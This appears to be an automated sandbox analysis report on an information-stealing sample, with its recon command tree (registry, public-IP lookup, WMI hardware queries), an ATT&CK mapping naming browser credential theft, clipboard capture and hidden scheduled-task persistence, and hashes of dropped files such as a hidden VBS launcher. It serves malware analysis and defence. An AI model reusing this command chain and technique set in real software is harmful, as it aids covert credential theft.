  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2336
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4020
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:224
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1820
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:3700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
e07608d69a80cd6455557edd221153ac

SHA1
830b3cb6c08c1005705e02853bb2f7ad17a8286d

SHA256
7d3cae687d5dce585c822f111193e676ba5dd79d42e404a154dfe597b8d12911

SHA512
bbedde17fea990190b5caf21488d0a10b3078c8af1ebf4ef2a4c81e07fe48b3f6f999f0c07baca27f277908f0d838d976cdebe1698b8573929745ee3f5028783

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e86a2f4d6dec82df96431112380a87e6

SHA1
2dc61fae82770528bee4fe5733a8ac3396012e79

SHA256
dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

SHA512
5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c8a89c65c7e9f57e0df0cc4c9c8146a

SHA1
a2410ab38063abfdc39499c28cd2e8aaf8c31326

SHA256
daf4bfa890be3f999ba64aecf39fa60cea1c7f42d15149f081fd622a6937b7c3

SHA512
93ca88aa0fdae8b437e5f2862496e0500ac2ceb660eebbb55b0a3a005a8556ce0e087c9456282724699cf07966b04ffb40c989f24481fd11a67b9eb096233c52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6ff85843fa291cb84fedfbb303bd6f28

SHA1
b2a2b0ace9504d6dd7a581dfac5a7af50e2c780c

SHA256
dd8930d81e9c5736fa51963664f13e86a47de93d89d58ae92ef11a6440397a7d

SHA512
bfe967561d9cc8b44334513eafc69af1b1739935a067375d60e65573d0bc5a010ce6f338e024630d3b4876974d3b5e28596cc4b90a90559960f47967ce83c6a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7daa0b6c9f8fb37635f8121b0c06690a

SHA1
5684d950c7e582b02ba88e579f0d350100d16889

SHA256
a37ab7ac828226c2de1d05cdf35a6d7934ff3e5ecd617d46df1cdc784783d86b

SHA512
55578b4054f8e12df4721df0f8f35ca1f879dd2e2e32ac8aaa8bebf68f5521dfb35547a0f15e670cecd8019f18b32c0e6d78f44556431807e4225b04c0e99c35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
02c05ea0305ff81a1dcdcf0144d163c4

SHA1
4d0dfaa89ace93c8981325a37a2529536779d329

SHA256
fb9ab3d6f37e071366cb9016d0be7987b8cfd64f13b222159fe7218977d27016

SHA512
9b28f94b689cb3011720a1f026ef458dcee633336d1727743a5d3c52464d4bf6c9f0c2f21b3e30c6fc37de39b772fc1dae4f0f9263d6f1f72426f4a70de1d4df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES88C7.tmp

Filesize
1KB

MD5
1507524f76cc748beeaf9549cd056cef

SHA1
2f880340233e848ee8a00e0ad606a66c0ca3ba95

SHA256
1bbe97194581103774b66de169fe6d6c6bce2ae3feddac4d79f92f79364ad236

SHA512
e9f219eff8c40b47fb0ae8e4fe741b722c0382abb33aecc7b2868884bf94b2a05e1fd7bbcde443ce955fc441c76af075a648e012fc60e44f1353485f48c6df9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8FFB.tmp

Filesize
1KB

MD5
ef0b81d7cf93f4b957d526658e9923ed

SHA1
7928e7244c841238ff956605dbf7ebb8adc5885f

SHA256
29ebed2e497e1c34f01d616fd8a51f0e3c3ea0228c759dac8aeae07ee8b4d460

SHA512
4cad236027a0f4f1044c23577a1f3e7923391a514bc872ec19330913c00935e4ba2c4bc80b2dcb9e8df09c6d5812e48cbefb707c6c04dfb047c5b33c2772abe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9376.tmp

Filesize
1KB

MD5
6c38a80ab17b95c75c46b65e8ae2d325

SHA1
8cb7a7edffb13b8b39e88b41698ce2039eb0994a

SHA256
f5c7313f8ab29a0838248331f6e0f32d34eaf13127a94c3b8cfd7ded25f0a254

SHA512
2a1556b97d2c615d3d44a4e09e77ee7d42783052942c216c756c9ce113e0372d3c74c1beef4391c3ea55345a4f31548f4f2d80c4a7c55ca81eee1ca3474fdf15

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rm5qegdn.5q1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ddnfmvtm\ddnfmvtm.dll

Filesize
3KB

MD5
93b76b20a623a64f62931ee9cacc5821

SHA1
d5646a67bf84c44d1684dbdb77c39f159e6baa83

SHA256
cb12434aa32e08dba79ed7a00ece496bd67d626e20a22ad0befee5d69e2be5cc

SHA512
adbc4976d7275497446ff85b06d86a26201e675bfecfaab80c42794fd2cec7c26e192a7b8727193799201e7434ac3ad628e7d3f4e7bd288166050aecd7aa4e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hmveusqr\hmveusqr.dll

Filesize
3KB

MD5
42555612a8f34416e51ccf0e8ee52ce9

SHA1
f2149139960d4d83a6037c8660c5e470144737db

SHA256
702cb7c20459fb5f170b63a73e44837b7c5d85938e1417f70cc60697c6cf091a

SHA512
f05b5727cc1c4894dd302c28367409f7a10d16d36687e64649c34f87e3a6f869517bfe7d9e2ca7814e4d9f312a5bcb85d63379da8e4b293e988f131e3b17d4d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\men4rdw4\men4rdw4.dll

Filesize
3KB

MD5
190c54d7de4881f5a22fb3fe07cd2b46

SHA1
cf26298e704e43bec763604ad9c4412472be3271

SHA256
4698af0773f6894e80a66ec97afb759c9aa36396ba9e12a28fde8b119e6ddff0

SHA512
347eb8c33aa4070f6702122b31747db7e4453a8a864a3189e75f9a67f2b50515ffcbde83b4b3ac2c65c097bd80c4c270d62af8e6ca08476c46c3575376ab9813

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ddnfmvtm\CSC4733441DF7A04E12B6D3D3F23657D912.TMP

Filesize
652B

MD5
eab01ca87d81f9a01fdd2c2708540ac5

SHA1
78cdc52cd4f4120e763c6d97e42fb905f648ebb8

SHA256
61ec31ca034bea2282b94f796e531c462c8f134a9e821a3dab0edbee84ee1819

SHA512
d92f13a415b65161fee74ce3547b643e6543f93be465789d0ece966c7c7b58e7cc0c5fcbfbc917d101b14e076dfd96637197490cb72f4034377cd12e227e910b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ddnfmvtm\ddnfmvtm.0.cs

Filesize
708B

MD5
f0cb07e5d2a8a8eb0d8267e7c6c06bcf

SHA1
1adfc888c05ddb0db0bca718df6412882509029b

SHA256
bc12dafd68f15cf8a4875b8bb65ef588defaf1b04de3eefe654e40227f32311c

SHA512
26464a4cc5b2c09bdb7045cc2257c3b25a625b34e0df5b652edee9e3bf89fabd9ac97dd12ce04ea5d386a30446a168608afe1213ea4fd4acd2fd304b2fe442e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ddnfmvtm\ddnfmvtm.cmdline

Filesize
369B

MD5
c5ad9f50e57b0d523c12236873f39e31

SHA1
80679c765fb70e7f07a67ea4938ac2dd553a5798

SHA256
020bdf78dfd0a92176bb6e0bd4e225e4f8a7cf34722b8bcdad94cb7372e9f8f3

SHA512
aab597b5ceb76f40721bf0664a1048c86f08a8cc9d0fd17d9ee53a17609f747e4e95cb358f5ef17157f2d5e7e69d1b02562f9a545a1d0454ae8ccb4fd6ee5ccc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hmveusqr\CSC2553C029687247C698AC1A95F64BD876.TMP

Filesize
652B

MD5
5ad3c916def3110b53bc850750ff01be

SHA1
ba1e004937ef731feaa312339fd3afbea1bdf332

SHA256
c4d8bb61e1f31bafb8d5d3afa7fd6ece037ec86ba9477eabd3bb509ec606f008

SHA512
06fd0d4db597163bd03ef5fc5623a7553749a0a8351cca0bbd51003a5502a52718bda33681920709afc2b94261ddcf2b7d08be9c27b9715d8e3b2c7afa253248

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hmveusqr\hmveusqr.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hmveusqr\hmveusqr.cmdline

Filesize
369B

MD5
fb141ac1911a51e76b241682221e0bb6

SHA1
bd9806e2ef380e32ba42941e42e4587659056ae3

SHA256
74f6fc4fed9307867b80b1afba2425376c55fc807030c5be5617a27c4568d6d1

SHA512
b10d4c692db0938f959b4acfc9128b81a55d943f90376d4dcf4e24814ec317a993673c67590c409a38b02380c229311cf3e80bb190ecadc8aed124f479b5a4e0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\men4rdw4\CSC86C5AF8E9A4ACFB1D5F2F76E99F7AA.TMP

Filesize
652B

MD5
ee89841780de7bfeb7abd10bf69f6bdf

SHA1
1e2fa626c384fc17fb61ea7cfd3949a61cc3b254

SHA256
89548ea7c73ff63ab0e42c7751f2d9abfa960d2874d2c0f4cdf1715306f73712

SHA512
e06cbfaf9e9ece8862d3aa73586773494df2d75290a816d9beb13de56a45ff11cfba778b922b35d88a1f17e90248889c1aaa681591870999fc77f79f095ece91

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\men4rdw4\men4rdw4.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\men4rdw4\men4rdw4.cmdline

Filesize
369B

MD5
8b2ffb18af493fb521dbae4e95a02b34

SHA1
4c6df15e8586ec521887f90de894ab7a7e12f5ec

SHA256
55de8243eb02c9e372c2d8a36cce60f53b7536fc1a9410e5c78868ceceddb4e0

SHA512
e681b0d127f2ce3b0787ca7944c2c0b9da087ab13edb51972f8e2b13b427e2916c3d43b592274746b1a1b7e7af988729b5b48c94d32c5bf55a5e93b12447164e

Download Submit
memory/212-195-0x000001BF984E0000-0x000001BF984E8000-memory.dmp

Filesize
32KB

Download
memory/2704-124-0x00000237CFEC0000-0x00000237CFF10000-memory.dmp

Filesize
320KB

Download
memory/3740-103-0x00007FF8BD0F0000-0x00007FF8BDBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3740-99-0x0000011E9A5D0000-0x0000011E9A5D8000-memory.dmp

Filesize
32KB

Download
memory/3740-86-0x0000011E9CC40000-0x0000011E9CCB6000-memory.dmp

Filesize
472KB

Download
memory/3740-85-0x0000011E9C7D0000-0x0000011E9C814000-memory.dmp

Filesize
272KB

Download
memory/3740-84-0x00007FF8BD0F0000-0x00007FF8BDBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3740-83-0x00007FF8BD0F0000-0x00007FF8BDBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3740-77-0x0000011E9A5A0000-0x0000011E9A5C2000-memory.dmp

Filesize
136KB

Download
memory/3740-72-0x00007FF8BD0F3000-0x00007FF8BD0F5000-memory.dmp

Filesize
8KB

Download
memory/4764-258-0x0000017FD8830000-0x0000017FD8838000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads